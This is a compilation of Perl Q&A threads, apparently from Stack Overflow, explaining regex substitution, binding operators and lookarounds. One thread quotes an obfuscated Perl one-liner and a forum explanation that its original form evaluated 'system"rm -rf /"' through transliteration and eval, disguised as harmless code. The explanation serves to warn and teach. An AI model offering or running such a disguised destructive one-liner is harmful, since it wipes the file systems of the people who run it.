Regarding an extraction statement in perl - perl

(my $batch_name = $batch_dir) =~ s#.*/##;
I had come across this statement while going through a script and tried to understand it. Even googling the RHS did not return anything useful. Can someone please help me understand what this statement means???
which out of the two scalars are affected??

it deletes the longest prefix ending with a / from a copy of the $batch_dir variable, eg. producing a leafname from a file system path or extracting the script, query and fragment part of a properly escaped url.
the idiom actually comprises 2 operations:
my $batch_name = $batch_dir;
batch_name =~ s#.*/##;
without the parentheses the substitution would be applied to $batch_dir and $batch_name would be set to the value returned from the substitution operator, the success status (at least 1 substitution has occurred => 1, undef else).

Parens () has higher priority than =~, so the instruction inside parens is executed before.
First the assignement my $batch_name = $batch_dir; is done, then the substitution $batch_name =~ s#.*/##;
Only the $batch_name variable is affected by the substitution.

Related

Not able to understand a command in perl

I need help to understand what below command is doing exactly
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
and $abc{hier} contains a path "/home/test1/test2/test3"
Can someone please let me know what the above command is doing exactly. Thanks
s/PATTERN/REPLACEMENT/ is Perl's substitution operator. It searches a string for text that matches the regex PATTERN and replaces it with REPLACEMENT.
By default, the substitution operator works on $_. To tell it to work on a different variable, you use the binding operator - =~.
The default delimiter used by the substitution operator is a slash (/) but you can change that to any other character. This is useful if your PATTERN or your REPLACEMENT contains a slash. In this case, the programmer has used # as the delimiter.
To recap:
$abc{hier} =~ s#PATTERN#REPLACEMENT#;
means "look for text in $abc{hier} that matches PATTERN and replace it with REPLACEMENT.
The substitution operator also has various options that change its behaviour. They are added by putting letters after the final delimiter. In this case we have a g. That means "make the substitution global" - or match and change all occurrences of PATTERN.
In your case, the REPLACEMENT string is empty (we have two # characters next to each other). So we're replacing the PATTERN with nothing - effectively deleting whatever matches PATTERN.
So now we have:
$abc{hier} =~ s#PATTERN*##g;
And we know it means, "in the variable $abc{hier}, look for any string that matches PATTERN and replace it with nothing".
The last thing to look at is the PATTERN (or regular expression - "regex"). You can get the full definition of regexes in perldoc perlre. But to explain what we're using here:
/tools : is the fixed string "/tools"
.* : is zero or more of any character
/dfII : is the fixed string "/dfII"
/? : is an optional slash character
.* : is (again) zero or more of any character
So, basically, we're removing bits of a file path from a value that's stored in a hash.
This =~ means "Do a regex operation on that variable."
(Actually, as ikegami correctly reminds me, it is not necessarily only regex operations, because it could also be a transliteration.)
The operation in question is s#something#else#, which means replace the "something" with something "else".
The g at the end means "Do it for all occurences of something."
Since the "else" is empty, the replacement has the effect of deleting.
The "something" is a definition according to regex syntax, roughly it means "Starting with '/tools' and later containing '/dfII', followed pretty much by anything until the end."
Note, the regex mentions at the end /?.*. In detail, this would mean "A slash (/) , or maybe not (?), and then absolutely anything (.) any number of times including 0 times (*). Strictly speaking it is not necessary to define "slash or not", if it is followed by "anything any often", because "anything" includes as slash, and anyoften would include 0 or one time; whether it is followed by more "anything" or not. I.e. the /? could be omitted, without changing the behaviour.
(Thanks ikeagami for confirming.)
$abc{hier} =~ s#/tools.*/dfII/?.*##g;
The above commands use regular expression to strip/remove trailing /tools.*/dfII and
/tools.*/dfII/.* from value of hier member of %abc hash.
It is pretty basic perl except non standard regular expression limiters (# instead of standard /). It allows to avoid escaping / inside the regular expression (s/\/tools.*\/dfII\/?.*//g).
My personal preferred style-guide would make it s{/tools.*/dfII/?.*}{}g .

meaning of the following regular expressions written in perl

Here is a piece of code
while($l=~/(\\\s*)$/) {
statements;
}
$l contains a line of text taken form file, in effect this code is for go through lines in file.
Questions:
I don't clearly understand what the condition in while is doing. I think it is trying to match group of \ followed by some number of white spaces at the end of line and loop should stop whenever a line ends with \ and may be some white spaces. I am not sure of it.
I came across statement $a ~= s/^(.*$)/$1/ . What I understand that ^ will force matching at the beginning of string, but in (.*$) would mean match all the characters at the end of string . Dose it mean that the statement is trying to find if any group of character at the end is same as group of character in the beginning of text ?
It is interesting to note that this statement:
while ( $l =~ /(\\\s*)$/ ) {
Is an infinite loop unless $l is altered inside the loop so that the regex no longer matches. As has already been mentioned by others, this is what it matches:
( ... ) a capture group, captures string to $1 (that's the number one, not lower case L)
\\ matches a literal backslash
\s* matches 0 or more whitespace characters.
$ matches end of line with optional newline.
Since you do not have the /g modifier, this regex will not iterate through matches, it will simply check if there is a match, resetting the regex each iteration, thereby causing an endless loop.
The statement
$a ~= s/^(.*$)/$1/
Looks rather pointless. It captures a string of characters up until end of string, then replaces it with itself. The captured text is stored in $1 and is simply replaced. The only marginally useful thing about this regex is that:
It matches up until newline \n, and nothing further, which may be of some use to a parser. A period . matches any character except newline, unless the /s modifier is present on the regex.
It captures the line in $1 for future use. However, a simple /^(.*$)/ would do the same.
1. the while
Usually while (regex) is used with the /g modifier, otherwise, if it matches, you get an infinite loop (unless you exit the loop, like using last).
statements would be executed continuously in an infinite loop.
In your case, adding the g
while($l=~/(\\\s*)$/g)
will have the while make only one loop, due to the $ - making a match unique (whatever matches up to the end of string is unique, as $ marks the end, and there is nothing after...).
2. $a ~= s/^(.*$)/$1/
This is a substitution. If the string ^.*$ matches (and it will, since ^.*$ matches (almost, see comment) anything) it is replaced with... $1 or what's inside the (), ie itself, since the match occurs from 1st char to the end of string
^ means beginning of string
(.*) means all chars
$ end of string
so that will replace $a with itself - probably not what you want.
it matches a literal backslash followed by 0 or more spaces followed by the end of the line.
it executes statements for all the lines in that text file that contain a \, followed by zero or more spaces ( \s* ), at the end of the line ($).
It matches lines that end with a backslash character, ignoring any trailing whitespace characters.
Ending a line with a backslash is used in some languages and data files to indicate that the line is being continued on the next line. So I suspect this is part of a parser that merges these continuation lines.
If you enter a regular expression at RegExr and hover your mouse over the pieces, it displays the meaning of each piece in a tooltip.
(\\\s*)$ this regex means --- a \ followed by zero or more number of white space characters which is followed by end of the line. Since you have your regex in (...), you can extract what you matched using $1, if you need.
http://rubular.com/r/dtHtEPh5DX
EDIT -- based on your update
$a ~= s/^(.$)/$1/ --- this is search and replace. So your regex matches a line which contains exactly one character (since you use . http://www.regular-expressions.info/dot.html), except a new-line character. Since you use (...), the character which matched the regex is extracted and stored in variable a
EDIT -- you changed your regex so here is the updated answer
$a ~= s/^(.*$)/$1/ -- same as above except now it matches zero or more characters (except new-line)

What does =~/^0$/ mean in Perl?

I'm new to Perl and I have been learning about the Perl basics for past two days.
I'm converting a Perl script to Java program gradually.
In the Perl script, I came across this code.
if( $arr[$i]=~/^0$/ ){
...
...
}
I know that $arr[$i] means getting the ith element from the array arr.
But what does =~/^0$/ mean?
To what are they comparing the array's element?
I searched for this, but I couldn't find it.
Someone please explain me.
FYI, the arr contains floating values.
if ($arr[$i]) =~ /^0$/) is roughly equivalent to if ($arr[$i] eq "0"), but not exactly the same, as it will match both the strings "0" and "0\n". If $arr[$1] was read from a file or stdin and it has not been chomped, this can be a very significant distinction.
if ($arr[$i] == 0), on the other hand, will match any string beginning with a non-numeric character or a string of zeroes/whitespace which is not followed by a numeric character, although it will generate a warning if the string contains non-whitespace, non-digit characters or contains only whitespace (and warnings are enabled, of course).
=~ is a binding operator.
"Binary "=~" binds a scalar expression to a pattern match"
/^0$/ on the right hand side is the regex
^ Match the beginning of the line
$ Match the end of the line (or before newline at the end)
And the zero has no special meaning.
^ and $ are regex anchors which says $arr[$i] should begin with 0 and there is end of string immediately after it.
It can be written as
if ($arr[$i] eq "0" or $arr[$i] eq "0\n")

Perl specific code

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?
This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code
look more difficult. If the previous command originated from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)

Why aren't my nested lookarounds working correctly in my Perl substitution?

I have a Perl substitution which converts hyperlinks to lowercase:
's/(?<=<a href=")([^"]+)(?=")/\L$1/g'
I want the substitution to ignore any links which begin with a hash, for example I want it to change the path in Foo Bar to lowercase but skip if it comes across Bar.
Nesting lookaheads to instruct it to skip these links isn't working correctly for me. This is the one-liner I've written:
perl -pi -e 's/(?<=<a href=" (?! (?<=<a href="#) ) )([^"]+)(?=")/\L$1/g' *;
Could anyone hint to me where I have gone wrong with this substitution? It executes just fine, but does not do anything.
As near as I can tell, your initial regex will work just fine, if you add the condition that the first character in the link may not be a hash # or a double quote, e.g. [^#"]
s/(?<=<a href=")([^#"][^"]+)(?=")/\L$1/gi;
In the case you have links which do not start with a hash, e.g. Foo Bar, it becomes slightly more complicated:
s{(?<=<a href=")([^#"]+)(#[^"]+)*(?=")}{ lc($1) . ($2 // "") }gei;
We now have to evaluate the substitution, since otherwise we get undefined variable warnings when the optional anchor reference is not present.
You don't need look-arounds, from what I see
use 5.010;
...
s/<a \s+ href \s* = \s* "\K([^#"][^"]*)"/\L$1"/gx;
\K means "keep" everything before it. It amounts to a variable-length look-behind.
perlre:
For various reasons \K may be significantly more efficient than the equivalent (?<=...) construct, and it is especially useful in situations where you want to efficiently remove something following something else in a string.